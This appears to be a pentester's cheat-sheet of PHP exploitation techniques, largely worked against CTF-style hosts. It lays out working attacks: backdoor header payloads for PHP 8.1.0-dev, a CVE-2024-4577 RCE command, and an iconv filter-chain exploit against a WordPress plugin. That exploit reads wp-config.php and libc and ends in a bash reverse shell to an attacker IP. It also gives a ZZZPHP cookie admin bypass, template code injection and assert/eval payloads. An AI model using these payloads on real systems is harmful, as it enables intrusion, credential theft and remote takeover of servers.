PHP

PHP Code Auditing - CTF Wiki ENctf-wiki.mahaloz.re

PHP 8.1.0-dev

Try RCE & SQLi

User-Agentt: zerodiumsleep(5); 
User-Agentt: zerodiumsystem('id');

PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC

PHP 8.3 < 8.3.8
PHP 8.2 < 8.2.20
PHP 8.1 < 8.1.29

GitHub - watchtowrlabs/CVE-2024-4577: PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoCGitHub

python watchTowr-vs-php_cve-2024-4577.py -c "<?php system('calc');?>" -t http://192.168.253.132/test.sina

Iconv

Iconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine (part 1)Ambionics

https://media.defcon.org/DEF%20CON%2032/DEF%20CON%2032%20presentations/DEF%20CON%2032%20-%20Charles%20Fol%20-%20Iconv%20set%20the%20charset%20to%20RCE%20exploiting%20the%20glibc%20to%20hack%20the%20PHP%20engine.pdfmedia.defcon.org

LFI

For buddyforms 2.7.7

GitHub - kyotozx/CVE-2024-2961-Remote-File-Read: This script demonstrates a proof-of-concept (PoC) for exploiting a file read vulnerability in the iconv library, as detailed in Ambionics Security's blog https://www.ambionics.io/blog/iconv-cve-2024-2961-p1.GitHub

# python lfi.py
Remote File Read - CVE-2024-2961
Enter the path of the file you want to read (e.g., /etc/passwd): ../wp-config.php
Enter a numeric ID for the upload (e.g., 1): 1
File uploaded successfully: http://host.htb/wp-content/uploads/2025/01/1-17.png
GIF89a\nM<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the website, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/documentation/article/editing-wp-config-php/
 *
 * @package WordPress
 */
<-SNIP->

RCE

Find libc.so path on the target machine

# curl 'http://host.htb/wp-admin/admin-ajax.php' -H "Content-Type: application/x-www-form-urlencoded" -d 'action=upload_image_from_url&id=1&accepted_files=image/gif&url=php://filter/convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-decode/resource=/proc/self/maps' -v
<-SNIP->
{"status":"OK","response":"http:\/\/host.htb\/wp-content\/uploads\/2025\/01\/1-21.png","attachment_id":191}#

# curl http://host.htb/wp-content/uploads/2025/01/1-21.png | grep libc.so
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     07f29c1467000-7f29c148d000 r--p 00000000 00:3b 292782                     /usr/lib/x86_64-linux-gnu/libc.so.6
7f29c148d000-7f29c15e2000 r-xp 00026000 00:3b 292782                     /usr/lib/x86_64-linux-gnu/libc.so.6
7f29c15e2000-7f29c1635000 r--p 0017b000 00:3b 292782                     /usr/lib/x86_64-linux-gnu/libc.so.6
7f29c1635000-7f29c1639000 r--p 001ce000 00:3b 292782                     /usr/lib/x86_64-linux-gnu/libc.so.6
7f29c1639000-7f29c163b000 rw-p 001d2000 00:3b 292782                     /usr/lib/x86_64-linux-gnu/libc.so.6
100 72048  100 72048    0     0   169k      0 --:--:-- --:--:-- --:--:--  169k

Download libc.so

# curl 'http://host.htb/wp-admin/admin-ajax.php' -H "Content-Type: application/x-www-form-urlencoded" -d 'action=upload_image_from_url&id=1&accepted_files=image/gif&url=php://filter/convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-decode/resource=/usr/lib/x86_64-linux-gnu/libc.so.6' -v
*   Trying 10.10.11.52:80...
* Connected to host.htb (10.10.11.52) port 80 (#0)
> POST /wp-admin/admin-ajax.php HTTP/1.1
> Host: host.htb
> User-Agent: curl/7.88.1
> Accept: */*
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 2069
> 
< HTTP/1.1 200 OK
< Date: Tue, 28 Jan 2025 08:41:14 GMT
< Server: Apache/2.4.62 (Debian)
< X-Powered-By: PHP/8.3.2
< X-Robots-Tag: noindex
< X-Content-Type-Options: nosniff
< Expires: Wed, 11 Jan 1984 05:00:00 GMT
< Cache-Control: no-cache, must-revalidate, max-age=0
< Referrer-Policy: strict-origin-when-cross-origin
< X-Frame-Options: SAMEORIGIN
< Vary: Accept-Encoding
< Content-Length: 115
< Content-Type: text/html; charset=UTF-8
< 
* Connection #0 to host host.htb left intact
{"status":"OK","response":"http:\/\/host.htb\/wp-content\/uploads\/2025\/01\/1-22.png","attachment_id":191}#

# wget http://host.htb/wp-content/uploads/2025/01/1-22.png

Clean and add missing headers:

1 - On your host, find the starting offset of libc.so section headers corresponding to the same version as on the victim, here libc.so.6

# readelf -S /lib/x86_64-linux-gnu/libc.so.6

There are 64 section headers, starting at offset 0x1d4458:

Section Headers:
  [Nr] Name              Type             Address           Offset
       Size              EntSize          Flags  Link  Info  Align
  [ 0]                   NULL             0000000000000000  00000000
<-SNIP->

Here the starting offset is 0x1d4458

2 - Extract libc.so from png file

# cat cleanPngToElf.py  
import os
import shutil

def extract_libc(png_path, output_path, start_offset, total_size):
    """
    Extract libc.so.6 data from a PNG file.
    """
    with open(png_path, 'rb') as png_file:
        # Read the exact number of bytes for libc.so.6
        png_file.seek(start_offset)
        extracted_data = png_file.read(total_size)

    with open(output_path, 'wb') as output_file:
        output_file.write(extracted_data)

    print(f"Extracted libc.so.6 data to {output_path}")
    print(f"Extracted size: {len(extracted_data)} bytes")

def append_valid_section_headers(libc_path, reference_libc_path):
    """
    Append valid section headers from a reference libc.so.6 to the extracted file.
    """
    with open(reference_libc_path, 'rb') as ref_file:
        ref_file.seek(section_headers_offset)
        section_headers_data = ref_file.read(total_section_headers_size)

    with open(libc_path, 'ab') as libc_file:
        libc_file.write(section_headers_data)

    print(f"Appended section headers from reference libc.so.6.")

# Paths to files
png_file_path = '1-22.png'
reference_libc_path = '/lib/x86_64-linux-gnu/libc.so.6'
output_libc_path = 'libc.so.7'

# Known offsets and sizes
elf_start_offset = 9  # ELF header start offset in 1-40.png
section_headers_offset = 0x1D4458  # Section headers offset in reference libc.so.6
total_section_headers_size = 60 * 64  # 60 section headers, each 64 bytes
total_size = section_headers_offset + total_section_headers_size - elf_start_offset  # Full size of libc.so.6

# Step 1: Extract the main ELF data from png file
extract_libc(
    png_path=png_file_path,
    output_path=output_libc_path,
    start_offset=elf_start_offset,
    total_size=total_size
)

# Step 2: Append section headers from the reference libc.so.6
append_valid_section_headers(
    libc_path=output_libc_path,
    reference_libc_path=reference_libc_path
)

print(f"Fixed libc.so.6 saved to: {output_libc_path}")

# python cleanPngToElf.py .py 
Extracted libc.so.6 data to libc.so.7
Extracted size: 1921871 bytes
Appended section headers from reference libc.so.6.
Fixed libc.so.6 saved to: libc.so.7

# file libc.so.7
libc.so.7: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=82ce4e6e4ef08fa58a3535f7437bd3e592db5ac0, for GNU/Linux 3.2.0, stripped

Exploit

GitHub - 0xSs0rZ/Buddyforms_exploitGitHub

Put the cleaned libc.so into LIBC_FILE

# python3 exploit.py 'http://host.htb/wp-admin/admin-ajax.php' 'bash -c "bash -i >& /dev/tcp/10.10.X.X/4444 0>&1"'

Extract

Allow to redefines variables defined in the code before extract() is used

PHP extract() bug - Technical NavigatorTechnical Navigator

CTF-Writeups/2016/SCTF/Ducks/README.md at master · HackThisSite/CTF-WriteupsGitHub

MetaRed CTF ArgentinaThe Security Wind

ZZZPHP

ISSESSION adminid Authentication Bypass

curl -i -X GET "http://$TARGET_HOST/admin871/?index" \
-H "Cookie: zzz_adminid=1"

curl -b "PHPSESSID=abcdef123456; zzz_adminid=1" http://target.com/admin.php

parserIfLabel eval PHP Code Injection

curl -X POST "http://$TARGET_HOST/admin871/save.php?act=editfile" \
 -H "Cookie: zzz_adminid=1" \
 -d "file=/template/pc/cn2016/html/search.html&filetext=
{if:phpinfo()}{end if}"

This command sends a POST request to edit search.html , injecting the PHP code phpinfo() into it.

After injecting the PHP code, accessing the search.html page or triggering its rendering will execute the injected code.

Ev1l eva1 bypass

curl -X POST "http://victime.com/vuln.php" \
  -d "user_input=assert&server_input=<?php phpinfo(); ?>&cookie_input=<?php system('whoami'); ?>" \
  -H "Cookie: session=<?php phpinfo(); ?>" \
  -H "X-Custom-Header: <?php system('ls'); ?>"

curl -X POST "http://victime.com/vuln.php" \
  -d "user_input=assert('phpinfo();')" \
  -H "Cookie: session=assert('phpinfo();')" \
  -H "X-Custom-Header: assert('phpinfo();')"